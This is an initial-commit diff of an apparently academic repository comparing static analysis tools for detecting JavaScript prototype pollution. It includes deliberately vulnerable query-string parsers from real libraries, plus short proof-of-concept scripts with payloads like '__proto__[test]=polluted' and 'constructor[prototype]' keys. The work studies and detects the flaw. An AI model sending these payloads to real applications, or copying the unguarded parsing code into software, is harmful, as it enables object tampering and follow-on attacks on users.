init

Author: dottif

README.md

@@ -0,0 +1,48 @@
+#Detecting prototype pollution vulnerabilities in JavaScript using static analysis
+This study focuses on prototype pollution vulnerability, a "new" type of security
+vulnerability, first discovered in 2018, that has not been studied in depth. The
+vulnerability exploits the prototype oriented design of JavaScript. By modifying
+the prototype of native objects such as Object, from which most other objects 
+inherit properties and methods, it’s possible, depending on the logic of the specific
+application, to escalate to almost any other web vulnerability.
+
+We collected JavaScript code containing real word prototype pollution vulnerability 
+examples searching on vulnerability databases such as GitHub Advisory and
+other sources. To be sure that the collected examples are actually vulnerable we
+wrote a simple proof of concept exploit for each vulnerable function. We ran the
+static analysis tools considered against the vulnerable applications. Among the
+vulnerability dataset we picked some case studies which we analyzed in detail to
+explain different code patterns that lead to the vulnerability. These case studies
+were chosen to show interesting results which allowed us to highlight the strengths
+and limitations of each tool.
+
+## Static Analysis Tools considered
+
+###[ODGen](https://github.com/Song-Li/ODGen) and [ObjLupAnsys](https://github.com/Song-Li/ObjLupAnsys)
+ODGen/ObjLupAnsys new approach, based on Object Dependence Graph
+which succesfully model object lookups based on prototype chain, can detect
+almost all vulnerability cases. The current experimental implementation,
+however, is affected by bugs when it encounters some code patterns. It also
+suffers from serious performance issues when analyzing large packages or
+certain patterns. Also, it is very prone to flag false positives when executed
+against patched version of precedently vulnerable functions.
+
+###[Semgrep](https://semgrep.dev/)
+Semgrep rules do not cover all cases such as direct assignments, due to the
+difficulty of including this case without having a very high false positive rate.
+The semgrep engine offers only limited intraprocedural dataflow analysis,
+and as expected can’t always detect vulnerability that are distributed across
+different functions (e.g. indirect recursive calls). The rules flag many false
+positives when executed against patched version of precedently vulnerable
+functions, as most mitigation techniques are not even considered.
+
+###[CodeQL](https://codeql.github.com/)
+CodeQL can identify almost all vulnerability examples collected. The queries
+considered seem to be well written, the problems encountered are most likely
+limitation of the closed source engine. For what concerns false postives,
+most mitigation techniques are considered, thus CodeQL queries performs
+significantly better than other tools.
+
+---
+
+More details in the [thesis pdf](./thesis.pdf)

case_studies/canjs/canjs-deparam-ed.js

@@ -0,0 +1,74 @@
+"use strict";
+
+var digitTest = /^\d+$/,
+    keyBreaker = /([^\[\]]+)|(\[\])/g,
+    paramTest = /([^?#]*)(#.*)?$/,
+    entityRegex = /%([^0-9a-f][0-9a-f]|[0-9a-f][^0-9a-f]|[^0-9a-f][^0-9a-f])/i,
+    startChars = {"#": true,"?": true},
+    prep = function (str) {
+        if (startChars[str.charAt(0)] === true) {
+            str = str.substr(1);
+        }
+        str = str.replace(/\+/g, ' ');
+
+        try {
+            return decodeURIComponent(str);
+        }
+        catch (e) {
+            return decodeURIComponent(str.replace(entityRegex, function(match, hex) {
+                return '%25' + hex;
+            }));
+        }
+    };
+
+function isArrayLikeName(name) {
+    return digitTest.test(name) || name === '[]';
+}
+
+function idenity(value){ return value; }
+
+function deparam (params, valueDeserializer) {
+    valueDeserializer = valueDeserializer || idenity;
+    var data = {}, pairs, lastPart;
+    if (params && paramTest.test(params)) {
+        pairs = params.split('&'); 
+        pairs.forEach(function (pair) {
+            var parts = pair.split('='),
+                key = prep(parts.shift()),
+                value = prep(parts.join('=')),
+                current = data;
+            if (key) {
+                parts = key.match(keyBreaker);
+                for (var j = 0, l = parts.length - 1; j < l; j++) {
+                    var currentName = parts[j],
+                        nextName = parts[j + 1],
+                        currentIsArray = isArrayLikeName(currentName) && current instanceof Array;
+                    if (!current[currentName]) {
+                        if(currentIsArray) {
+                            current.push( isArrayLikeName(nextName) ? [] : {} );
+                        } else {
+                            // If what we are pointing to looks like an `array`
+                            current[currentName] = isArrayLikeName(nextName) ? [] : {};
+                        }
+
+                    }
+                    if(currentIsArray) {
+                        current = current[current.length - 1];
+                    } else {
+                        current = current[currentName]; //obj.__proto__
+                    }
+
+                }
+                lastPart = parts.pop();
+                if ( isArrayLikeName(lastPart) ) {
+                    current.push(valueDeserializer(value));
+                } else {
+                    current[lastPart] = valueDeserializer(value); //obj.__proto.__.test = val
+                }
+            }
+        });
+    }
+    return data;
+}
+
+module.exports = {deparam};

case_studies/canjs/canjs-deparam-poc.mjs

@@ -0,0 +1,8 @@
+import * as query from './canjs-deparam-ed.js';
+console.log({}.test);
+console.log({}.test2);
+console.log(query.deparam('?__proto__[test]=polluted&__proto__[kek]=rekt'));
+console.log(query.deparam('constructor[prototype][test2]=polluted'));
+console.log({}.test);
+console.log({}.kek);
+console.log({}.test2);

case_studies/canjs/canjs.md

@@ -0,0 +1,3 @@
+References:
+
+https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/canjs-deparam.md

case_studies/canjs/package.json

@@ -0,0 +1,4 @@
+{ "name" : "foo"
+, "version" : "1.2.3"
+, "main" : "canjs-deparam-ed.js"
+}

case_studies/component_querystring/component_querystring.js

@@ -0,0 +1,49 @@
+var pattern = /(\w+)\[(\d+)\]/;
+
+var decode = function(str) {
+  try {
+    return decodeURIComponent(str.replace(/\+/g, ' '));
+  } catch (e) {
+    return str;
+  }
+}
+
+exports.parse = function(str){
+  if ('string' != typeof str) return {};
+
+  str = str.trim();
+  if ('' == str) return {};
+  if ('?' == str.charAt(0)) str = str.slice(1);
+
+  var obj = {};
+  var pairs = str.split('&'); 
+  for (var i = 0; i < pairs.length; i++) {
+    var parts = pairs[i].split('='); 
+    //[ '__proto__[1337]', 'polluted' ]
+    var key = decode(parts[0]);
+    //'__proto__[1337]'
+    var m;
+
+    if (m = pattern.exec(key)) {
+    //m 
+    //   [
+    //      '__proto__[1337]',
+    //      '__proto__',
+    //      '1337',
+    //      index: 0,
+    //      input: '__proto__[1337]',
+    //      groups: undefined
+    //    ]
+      obj[m[1]] = obj[m[1]] || [];
+      obj[m[1]][m[2]] = decode(parts[1]); //Triggers the Prototype pollution
+    //{}.__proto__.1337 = 'polluted';
+      continue;
+    }
+
+    obj[parts[0]] = null == parts[1]
+      ? ''
+      : decode(parts[1]);
+  }
+
+  return obj;
+};

case_studies/component_querystring/component_querystring.md

@@ -0,0 +1,7 @@
+References:
+
+https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/component_querystring.md
+
+https://github.com/component/querystring/blob/7334366bae9b0434d2aa3a6ac9a9039eb1d17144/index.js#L65-L67
+
+https://blog.s1r1us.ninja/research/PP#h.ba604pvst6oj

case_studies/component_querystring/package.json

@@ -0,0 +1,4 @@
+{ "name" : "foo"
+, "version" : "1.2.3"
+, "main" : "./component_querystring.js"
+}

case_studies/component_querystring/poc.mjs

@@ -0,0 +1,4 @@
+import * as query from './component_querystring.js';
+console.log({}[1337]);
+query.parse('__proto__[1337]=polluted');
+console.log({}[1337]);

case_studies/extend2/extend2-arguments-poc.mjs

@@ -0,0 +1,4 @@
+import * as e from "./index-arguments.js"
+console.log("Before " + {}.polluted)
+e.extend(true, {}, JSON.parse('{"__proto__": {"polluted": "polluted"}}'))
+console.log("After: " + {}.polluted)